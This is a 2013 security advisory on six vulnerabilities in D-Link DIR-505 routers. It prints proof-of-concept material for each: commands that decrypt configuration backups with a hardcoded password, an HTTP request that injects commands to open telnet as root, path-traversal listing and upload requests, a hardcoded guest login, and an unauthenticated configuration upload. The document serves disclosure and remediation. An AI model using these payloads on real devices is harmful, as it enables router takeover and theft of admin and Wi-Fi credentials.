D-Link DIR-505 Bypass / Privilege Escalation/ Traversal / Code Injection

`Multiple vulnerabilities on D-Link Dir-505 devices  
==================================================  
  
[ADVISORY INFORMATION]  
Title: Multiple vulnerabilities on D-Link Dir-505 devices  
Discovery date: 05/04/2013  
Release date: 09/09/2013  
Credits: Alessandro Di Pinto (alessandro.dipinto () artificialstudios org)  
Twitter: @adipinto  
  
[AFFECTED PRODUCTS]  
This security vulnerability affects the following products and firmware  
versions:  
  
* D-Link DIR-505, firmware version <= 1.06  
  
Other products and firmware versions could also be vulnerable, but they were  
not checked.  
  
[VULNERABILITY DETAILS]  
  
1) Weak configuration file encryption  
The file provided to the end-user in order to make a backup copy of the device  
configuration, is encrypted with a hardcoded password. The device firmware  
creates the configuration file in three specific steps, as shown below:  
- Collect the configuration data to backup  
- Encrypt entries with the hardcoded password "sw5-superman"  
- Create the file header through the tool "imghdr"  
  
The file header has the fixed-size of 84 byte. An attacker ables to get an  
encrypted configuration file could decrypt its contents with the following  
command:  
  
sh# dd if=config-file of=config-file-no-header bs=84 skip=1  
sh# ccrypt -d -K sw5-superman config-file-no-header  
  
Decrypted file contains sensitive information that an attacker could use  
in order to compromise the target device (e.g., admin password and WPA  
passphrase).  
  
Furthermore, an attacker can craft a own configuration file, encrypt it with  
the hardcoded password, append at the beginning of file a valid header and  
finally upload the new configuration to the target device without  
authentication, exploiting the "Authentication bypass" issue described inside  
this advisory.  
  
  
2) Command Injection  
An authenticated attacker can exploit the "Ping Test" feature exposed inside  
the page "/System_Check.htm", in order to execute arbitrary commands inside the  
device, with root privileges. More precisely, the "ip_addr" parameter is not  
sanitized properly, thus it is possible to leverage traditional command  
injection techniques. This security issue is exploitable only after a  
successful authentication.  
  
Proof-of-Concept used to open telnet on vulnerable devices:  
  
"""  
POST /my_cgi.cgi HTTP/1.1  
Host: [IP]  
Cookie: uid=[VALID-COOKIE-HERE]  
Content-Length: 55  
  
request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;  
"""  
  
3) Path traversal (directory listing)  
The web-gui exposed through the port 8181/TCP is used to explore the contents  
of the USB drive, connected at the device. Normally the end-user is allowed to  
list only the files inside the own USB drive but, due to insufficient security  
checks, an attacker is ables to list the contents of every file system  
directories. Only authenticated users can exploit this issue.  
  
Proof-of-Concept used to list the device's /etc/ directory:  
  
http://192.168.0.1:8181/dws/api/ListFile?id=admin&tok=  
&volid=1&path=usb_dev/usb_A1/../../../../etc  
  
  
4) Path traversal (file upload)  
The web-gui exposed through the port 8181/TCP allows authorized users (e.g.,  
admin user) to upload files inside the USB drive connected at the device. The  
upload feature is present at the following link:  
  
http://[IP]:8181/folder_view.htm  
  
The upload operation is performed through a POST request to the resource  
"/dws/api/UploadFile" using a "multipart/form-data" content-type. Several  
parameters are passed but the "path" parameter can be abused in order to modify  
the destination directory of the uploaded file. This issue allows an  
authenticated user to upload an arbitrary file inside the target device.  
  
Proof-of-Concept used to upload a simple text file inside the /tmp/ directory:  
  
"""  
POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1  
Host: [IP]:8181  
Cookie: uid=[VALID-COOKIE-HERE]  
Content-Type: multipart/form-data;  
boundary=---------------------------736034324104825609817274318  
Content-Length: 1179  
  
-----------------------------736034324104825609817274318  
Content-Disposition: form-data; name="id"  
  
admin  
-----------------------------736034324104825609817274318  
Content-Disposition: form-data; name="tok"  
  
-----------------------------736034324104825609817274318  
Content-Disposition: form-data; name="volid"  
  
1  
-----------------------------736034324104825609817274318  
Content-Disposition: form-data; name="path"  
  
usb_dev/usb_A1/../../../../../../../../../tmp/  
-----------------------------736034324104825609817274318  
Content-Disposition: form-data; name="filename"  
  
exploit.txt  
-----------------------------736034324104825609817274318  
Content-Disposition: form-data; name="upload_file"; filename="test.txt"  
Content-Type: text/plain  
  
malicious text  
-----------------------------736034324104825609817274318--  
"""  
  
  
5) Privilege escalation (hardcoded credential)  
The upload feature, described in the issue 4 titled "Path traversal (upload  
file)", is theoretically designed to be used only by authorized users (selected  
through the web-gui). The device has the following hardcoded user which cannot  
be deleted using the web-gui:  
  
username: guest  
password: guest  
  
Using this credential, the end-user can access the web-gui (exposed on the port  
8181/TCP) in read-only mode; the button used to upload files is disabled in  
attempt to deny unauthorized operations. However due to a wrong session  
handling, an attacker can bypass described limitation following below steps:  
- Login with the hardcoded user "guest" in order to get a valid cookie.  
- Using this cookie it is possible to make a direct upload request like the  
Proof-of-Concept described previously in the issue 4.  
  
The purpose of this exploit is to perform an arbitrary file upload using an  
hardcoded (read-only) user.  
  
  
6) Authentication bypass  
The "my_cgi.cgi" resource exposes several features accessible with no  
authentication. In particular, every request that specifies the HTTP header  
field "Content-type: multipart/form-data" is processed without perform any  
authentication check. An *unauthenticated* attacker can exploit this issue in  
order to upload a malicious configuration on the target device, overwriting the  
original configurations (e.g., set a new admin password).  
  
Proof-of-Concept used to upload a configuration file without perform the login:  
  
"""  
POST /my_cgi.cgi HTTP/1.1  
Host: [IP]  
Cookie: uid=[VALID-COOKIE-HERE]  
Content-Type: multipart/form-data;  
boundary=---------------------------4318828241986447042487864450  
Content-Length: 382  
  
-----------------------------4318828241986447042487864450  
Content-Disposition: form-data; name="which_action"  
  
load_conf  
-----------------------------4318828241986447042487864450  
Content-Disposition: form-data; name="file"; filename="attacker-config.bin"  
Content-Type: text/plain  
  
[MALICIOUS-CONFIGURATION-HERE]  
-----------------------------4318828241986447042487864450--  
"""  
  
[REMEDIATION]  
D-Link has released an updated firmware version (1.07) that addresses most of  
the described issues. Firmware is already available on D-Link web site, at the  
following URL:  
ftp://ftp.dlink.com/Gateway/dir505/Firmware/dir505_fw_107.zip  
  
[DISCLAIMER]  
The author is not responsible for the misuse of the information provided in  
this security advisory. The advisory is a service to the professional security  
community. There are NO WARRANTIES with regard to this information. Any  
application or distribution of this information constitutes acceptance AS IS,  
at the user's own risk. This information is subject to change without notice.  
`